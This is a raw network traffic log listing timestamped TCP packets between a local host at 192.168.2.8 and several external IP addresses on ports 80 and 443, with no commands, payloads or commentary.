Dec 18, 2024 13:38:27.835645914 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.835695982 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.835705042 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.835751057 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.836700916 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.836771965 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.836839914 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.836893082 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.837914944 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.837934017 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.837976933 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.837996960 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.839004040 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.839068890 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.839169979 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.839224100 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.973033905 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.973192930 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.973216057 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.973290920 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.973514080 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.973581076 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.973617077 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.973675966 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.974391937 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.974438906 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.974448919 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.974492073 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.975367069 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.975379944 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.975435972 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.976089954 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.976161957 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.976237059 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.976290941 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.977071047 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.977129936 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.977291107 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.977344036 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.978044987 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.978055954 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.978099108 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.978817940 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.978856087 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.978878021 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.978904963 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.979677916 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.979733944 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.979803085 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.979852915 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.980549097 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.980603933 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.980694056 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.980743885 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.981409073 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.981467962 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.981506109 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.981555939 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.982331038 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.982389927 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.982420921 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.982474089 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.983261108 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.983273983 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.983336926 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.984173059 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.984231949 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.984277010 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.984352112 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.984977961 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.985033989 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.985073090 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.985124111 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.985975027 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.985986948 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.986035109 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.986767054 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.986828089 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.986866951 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.986913919 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.987858057 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.987869978 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.987925053 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.988568068 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.988625050 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.988954067 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.989010096 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.989516020 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.989528894 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.989568949 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.989588022 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.990288973 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.990345001 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.990386963 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.990437984 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.991182089 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.991239071 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.991337061 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.991388083 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.992161036 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.992239952 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.992260933 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.992321968 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.993139982 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.993196011 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.993279934 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.993331909 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.993856907 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.993908882 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.993969917 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.994020939 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.994829893 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.995028973 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.995086908 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.995623112 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.995677948 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.995850086 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.995914936 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.996668100 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.996680975 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.996723890 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.996740103 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.997474909 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.997488022 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.997623920 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.998341084 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.998394012 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.998425961 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.998476982 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.999116898 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.999170065 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:27.999285936 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:27.999355078 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:28.000097036 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:28.000153065 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:28.000345945 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:28.000397921 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:28.000941038 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:28.000993013 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:28.001025915 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:28.001074076 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:28.001754045 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:28.001813889 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:30.260381937 CET	49711	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:30.260756969 CET	49714	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:30.380491972 CET	80	49714	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:30.380606890 CET	49714	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:30.380680084 CET	80	49711	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:30.380764008 CET	49711	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:30.380966902 CET	49714	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:30.500936985 CET	80	49714	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:31.630073071 CET	443	49713	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:31.630204916 CET	443	49713	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:31.630261898 CET	49713	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:31.653501987 CET	49713	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:31.653518915 CET	443	49713	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:31.731475115 CET	80	49714	185.215.113.43	192.168.2.8
Dec 18, 2024 13:38:31.731537104 CET	49714	80	192.168.2.8	185.215.113.43
Dec 18, 2024 13:38:31.733374119 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:31.733730078 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:31.735296011 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:31.735331059 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:31.735407114 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:31.735812902 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:31.735826015 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:31.853372097 CET	80	49712	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:31.853430033 CET	49712	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:31.855952978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:31.856034994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:31.856322050 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:31.976016998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:32.042246103 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:32.042285919 CET	443	49717	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:32.042366028 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:32.043441057 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:32.043457985 CET	443	49717	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:32.967168093 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:32.967232943 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:32.968858004 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:32.968872070 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:32.969208956 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:32.970385075 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:32.970412016 CET	49716	443	192.168.2.8	104.21.64.80
Dec 18, 2024 13:38:32.970472097 CET	443	49716	104.21.64.80	192.168.2.8
Dec 18, 2024 13:38:33.203787088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.203897953 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.203908920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.204010010 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.204118013 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.204174995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.204236984 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.204250097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.204262018 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.204291105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.204327106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.204555035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.204566956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.204579115 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.204611063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.204646111 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.267992020 CET	443	49717	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:33.268101931 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:33.270216942 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:33.270230055 CET	443	49717	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:33.270570993 CET	443	49717	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:33.321667910 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:33.323555946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.323570967 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.323632002 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.323662996 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.327698946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.327769041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.327883005 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.327925920 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.332417011 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:33.332437992 CET	49717	443	192.168.2.8	104.21.23.76
Dec 18, 2024 13:38:33.332524061 CET	443	49717	104.21.23.76	192.168.2.8
Dec 18, 2024 13:38:33.396330118 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.396401882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.396436930 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.396486044 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.400789022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.400875092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.400943995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.401004076 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.408823967 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.408890963 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.408936977 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.408996105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.417265892 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.417305946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.417344093 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.417406082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.425950050 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.426012993 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.426064968 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.426124096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.434112072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.434173107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.434283972 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.434334993 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.442614079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.442687988 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.442800045 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.442856073 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.450917006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.451000929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.451000929 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.451051950 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.459353924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.459443092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.459569931 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.459628105 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.467765093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.467840910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.467848063 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.467896938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.475703955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.475768089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.475826979 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.475886106 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.483601093 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.483664036 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.483719110 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.483906031 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.588131905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.588216066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.588232994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.588299036 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.590409994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.590464115 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.591218948 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.591283083 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.591376066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.591427088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.595916986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.595942974 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.595982075 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.596020937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.600522041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.600595951 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.600640059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.600691080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.605118990 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.605180979 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.605231047 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.605283976 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.609832048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.609859943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.609909058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.609945059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.615360022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.615375996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.615430117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.615430117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.619139910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.619167089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.619350910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.623764992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.623831034 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.623887062 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.623946905 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.628705025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.628772974 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.628782034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.628839970 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.633308887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.633367062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.633533955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.633589029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.637887955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.637904882 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.637953997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.642596960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.642613888 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.642657042 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.642683029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.646924019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.646991968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.647059917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.647118092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.651599884 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.651653051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.651689053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.651737928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.656322002 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.656338930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.656379938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.656389952 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.660978079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.661020994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.661036968 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.661066055 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.665559053 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.665613890 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.665676117 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.665726900 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.670274019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:33.670331001 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:33.670480967 CET	80	49715	31.41.244.11	192.168.2.8
